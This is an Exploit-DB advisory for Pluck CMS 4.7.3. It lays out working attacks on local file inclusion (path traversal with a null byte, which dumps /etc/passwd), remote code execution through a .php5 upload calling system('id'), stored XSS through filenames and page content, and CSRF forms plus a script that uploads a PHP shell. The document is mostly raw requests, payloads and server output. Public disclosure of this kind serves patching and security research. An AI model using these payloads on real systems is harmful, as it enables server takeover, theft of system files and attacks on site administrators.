Pluck CMS 4.7.3 - Multiple Vulnerabilities

EDB-ID:

38002

CVE:


EDB Verified:

Author:

smash

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-08-28

Vulnerable App: 
# Title: Pluck 4.7.3 - Multiple vulnerabilities
# Date: 28.08.15
# Vendor: pluck-cms.org
# Affected versions: => 4.7.3 (current)
# Tested on: Apache2.2 / PHP5 / Deb32
# Author: Smash_ | smaash.net
# Contact: smash [at] devilteam.pl

Few vulnerabilities.

Bugs:
 - local file inclusion
 - code execution
 - stored xss
 - csrf


1/ LFI

File inclusion vulnerability in pluck/admin.php in the in 'action' function allows  to include local files or potentially execute arbitrary PHP code.

#1 - Request (count = en.php by default):
POST /pluck/admin.php?action=language HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=language
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

cont1=../../../../../../../etc/passwd&save=Save


#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:01:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7374
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
<div id="content">
	<h2>language settings</h2>
<div class="success">The language settings have been saved.</div>
(...)

#2 - Request:
POST /pluck/admin.php?action=language HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=language
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

cont1=../../../../../../etc/passwd%00&save=Save

#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:30:11 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Set-Cookie: PHPSESSID=63erncd2l94qcah8g13bfvcga6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4503
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
avahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false
iodine:x:115:65534::/var/run/iodine:/bin/false
postgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false
saned:x:125:137::/home/saned:/bin/false
devil:x:1000:1001:devil,,,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server,,,:/var/lib/redis:/bin/false
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="../../../../../../etc/passwd" lang="../../../../../../etc/passwd">
<head>
(...)



2/ Code Execution

By default .php extenions shall be amended to .txt, but it is able to upload code simply by using other extension like php5.

#1 - Request:
POST /pluck/admin.php?action=files HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=files
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------155797884312716218971623852778
Content-Length: 376

-----------------------------155797884312716218971623852778
Content-Disposition: form-data; name="filefile"; filename="phpinfo.php5"
Content-Type: application/x-php

<?php
system('id');
?>

-----------------------------155797884312716218971623852778
Content-Disposition: form-data; name="submit"

Upload
-----------------------------155797884312716218971623852778--


#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:41:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9947
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)


#2 - Request:
GET /pluck/files/phpinfo.php5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=files
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive

#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:41:44 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)




3/ STORED XSS

 a) image upload
 
XSS is possible via file name.

Request:
POST /pluck/admin.php?action=images HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=images
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3184135121063067737320373181
Content-Length: 5013

-----------------------------3184135121063067737320373181
Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(1337)>.png"
Content-Type: image/png

(...)

-----------------------------3184135121063067737320373181
Content-Disposition: form-data; name="submit"

Upload
-----------------------------3184135121063067737320373181--

Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:43:19 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9125
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
				<div class="menudiv">
					<strong>Name:</strong> <img src=# onerror=alert(1337)>.png					<br />
					<strong>Size:</strong> 4653 bytes					<br />
					<strong>Type:</strong> image/png					<br />
					<strong>Upload successful!</strong>
				</div>
(...)


 b) page
 
XSS is possible when changing request, value of POST 'content' will be encoded by default.

#1 - Request:
POST /pluck/admin.php?action=editpage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=editpage
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

title=hello12&seo_name=&content=<script>alert(1337)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=Save

#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:11:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7337
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

#2 - Request:
GET /pluck/?file=hello12 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/?file=hello
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive

#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:11:51 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1289
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
		<div class="submenu">
						</div>
		<div class="kop">hello12</div>
		<div class="txt">
			<script>alert(1337)</script>					</div>
		<div style="clear: both;"> </div>
		<div class="footer">
(...)




4/ CSRF

Since there is no protection at all, it is able to trigger many actions via cross site request forgery.

<html>
  <!-- Change site settings -->
  <body>
    <form action="http://localhost/pluck/admin.php?action=settings" method="POST">
      <input type="hidden" name="cont1" value="pwn" />
      <input type="hidden" name="cont2" value="usr&#64;mail&#46;box" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <!-- File upload -->
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/pluck/admin.php?action=files", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------155797884312716218971623852778");
        xhr.withCredentials = true;
        var body = "-----------------------------155797884312716218971623852778\r\n" + 
          "Content-Disposition: form-data; name=\"filefile\"; filename=\"phpinfo.php5\"\r\n" + 
          "Content-Type: application/x-php\r\n" + 
          "\r\n" + 
          "\x3c?php\r\n" + 
          "system(\'id\');\r\n" + 
          "?\x3e\r\n" + 
          "\r\n" + 
          "-----------------------------155797884312716218971623852778\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------155797884312716218971623852778--";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
  </body>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services